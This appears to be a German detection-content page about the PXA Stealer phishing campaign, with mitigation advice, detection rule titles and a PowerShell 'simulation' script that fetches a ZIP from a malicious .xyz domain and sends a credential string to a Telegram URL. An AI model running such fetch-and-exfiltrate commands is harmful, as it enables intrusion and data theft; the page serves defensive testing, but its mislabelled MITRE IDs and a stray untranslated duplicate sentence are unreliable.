Von Phishing bis Exfiltration: Ein detaillierter Einblick in den PXA Stealer
Detection stack
- AIDR
- Alert
- ETL
- Query
Zusammenfassung
Der Bericht beschreibt einen starken Anstieg der PXA Stealer-Aktivitäten, die auf Finanzorganisationen Anfang 2026 abzielen. Bedrohungsakteure verbreiten bösartige ZIP-Archive über Phishing-E-Mails und stützen sich auf eine mehrstufige Infektionskette, die legitime Systemtools und einen umbenannten Python-Interpreter missbraucht. Sobald aktiv, stiehlt die Malware Browser-Anmeldedaten, gespeicherte Passwörter und Krypto-Wallet-Daten und exfiltriert diese gesammelten Informationen über Telegram. Die Kampagne hebt hervor, wie sich die Betreiber nach früheren Störungen anderer Infostealer-Ökosysteme angepasst haben.
Untersuchung
Forscher bei CyberProof rekonstruierten die vollständige Angriffskette, die mit einer Phishing-E-Mail begann, die ein bösartiges Pumaproject.zip-Archiv lieferte, und mit der Exfiltration über Telegram endete. Ihre Analyse identifizierte den Missbrauch von Certutil zum Entschlüsseln, eine als Bild getarnte WinRAR-Kopie zur Entpackung, einen versteckten Dots-Ordner und einen umbenannten svchost.exe Python-Interpreter, der verwendet wurde, um ein verschleiertes Skript mit einer Bot-ID zu starten. Die Persistenz wird durch einen Registrierungseintrag aufrechterhalten. picture.png for extraction, a hidden Dots folder, and a renamed svchost.exe Python interpreter used to launch an obfuscated script tied to a bot identifier. Persistence is maintained through a registry value entry.
Minderung
Verteidiger sollten verdächtige Archivanhänge identifizieren, die Skriptausführung und bekannte LOLBins von unerwarteten Pfaden überwachen und ausgehenden Datenverkehr zu Telegram sowie ungewöhnliche TLDs wie .shop and .xyz. Sicherheits-Teams sollten auch E-Mail-Gateways härten und strenge Ausführungskontrollen für Office-Dokumente und skriptbasierte Inhalte anwenden.
Reaktion
Wenn der PXA Stealer entdeckt wird, isolieren Sie den betroffenen Host, erfassen Sie flüchtige Beweise und suchen Sie nach den referenzierten Dateiartefakten und Registrierungsänderungen. Entfernen Sie bösartige Dateien, beenden Sie betroffene Prozesse und setzen Sie alle kompromittierten Anmeldeinformationen zurück. Infolgedessen sollten Teams eine breitere Bedrohungssuche nach übereinstimmenden Indikatoren in der Umgebung durchführen und relevante Stakeholder benachrichtigen.
Angriffsablauf
Erkennungen
Systemprozesse, die von unüblichen Pfaden ausgeführt werden (via process_creation)
Anzeigen
Verdächtige Command and Control durch ungewöhnliche Top-Level-Domain (TLD) DNS-Anfrage (via dns)
Anzeigen
Verdächtige Ausführung aus öffentlichem Benutzerprofil (via process_creation)
Anzeigen
Ungewöhnliche Erweiterung eines ausführbaren Binaries (via process_creation)
Anzeigen
Verdächtige Dateien im öffentlichen Benutzerprofil (via file_event)
Anzeigen
Verwendung von Certutil zur Datenkodierung und Zertifikatsoperationen (via cmdline)
Anzeigen
IOCs (HashMd5) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer Teil 2
Anzeigen
IOCs (DestinationIP) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in den PXA Stealer
Anzeigen
IOCs (HashMd5) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer Teil 1
Anzeigen
IOCs (SourceIP) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer
Anzeigen
IOCs (HashSha256) zur Erkennung: Vom Phishing bis zur Exfiltration: Ein tiefer Einblick in PXA Stealer
Anzeigen
Erkennung der Ausführungsaktivitäten von PXA Stealer [Windows-Prozesserstellung]
Anzeigen
Erkennen der ausgehenden Verbindungen des PXA Stealers [Windows-Netzwerkverbindung]
Anzeigen
Simulationsausführung
Voraussetzung: Der Telemetrie- und Basislinien-Pre-flight-Check muss bestanden sein.
Begründung: In diesem Abschnitt werden die genauen Ausführungen der Angreifertechnik (TTP) detailliert beschrieben, die entwickelt wurde, um die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die exakte Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.
-
Angriffsablauf & Befehle:
Der Bedrohungsakteur setzt den PXA Stealer auf einem kompromittierten Windows-Host ein. Nachdem der Benutzer unwissentlich das anfängliche bösartige Binary ausführt (T1204.002), startet der Stealer ein PowerShell-Snippet, das:-
Ein bösartiges ZIP herunterlädt von der fest codierten Domain
downloadtheproject.xyz(T1202 – indirekte Befehlsausführung). -
Die gesammelten Daten exfiltriert durch Posten einer Nachricht auf einem Telegram-Kanal via
t.me(T1559.002 – Phishing-Link). - Optional eine bösartige COM-Komponente lädt, um Persistenz zu erreichen (T1127.002).
Beide ausgehenden HTTP GET-Anfragen erzeugen die
DestinationDomainFelder, die die Sigma-Regel überwacht und dadurch einen Alarm auslöst. -
Ein bösartiges ZIP herunterlädt von der fest codierten Domain
-
Regressionstestskript:
# PXA Stealer-Simulation – löst die Erkennungsregel aus $tmpZip = "$env:TEMPpayload.zip" $tmpMsg = "$env:TEMPsteal.txt" # 1. Herunterladen des bösartigen ZIP von der ersten bösartigen Domain Invoke-WebRequest -Uri "https://downloadtheproject.xyz/malware.zip" -OutFile $tmpZip -UseBasicParsing # 2. Simulieren der Datenexfiltration über den Telegram-Link $payload = "User credentials: admin / Pass123!" Set-Content -Path $tmpMsg -Value $payload -Encoding ASCII Invoke-WebRequest -Uri "https://t.me/stealchannel?text=$( [uri]::EscapeDataString($payload) )" -UseBasicParsing # 3. (Optional) Laden eines Dummy-COM-Objekts zur Emulation von T1127.002 try { $com = New-Object -ComObject "Shell.Application" $com.ShellExecute($tmpZip, "", "", "open", 0) | Out-Null } catch { # Ignore errors – this is only for telemetry } -
Säuberungsbefehle:
# Entfernen von Artefakten, die durch die Simulation erstellt wurden Remove-Item -Path $tmpZip -Force -ErrorAction SilentlyContinue Remove-Item -Path $tmpMsg -Force -ErrorAction SilentlyContinue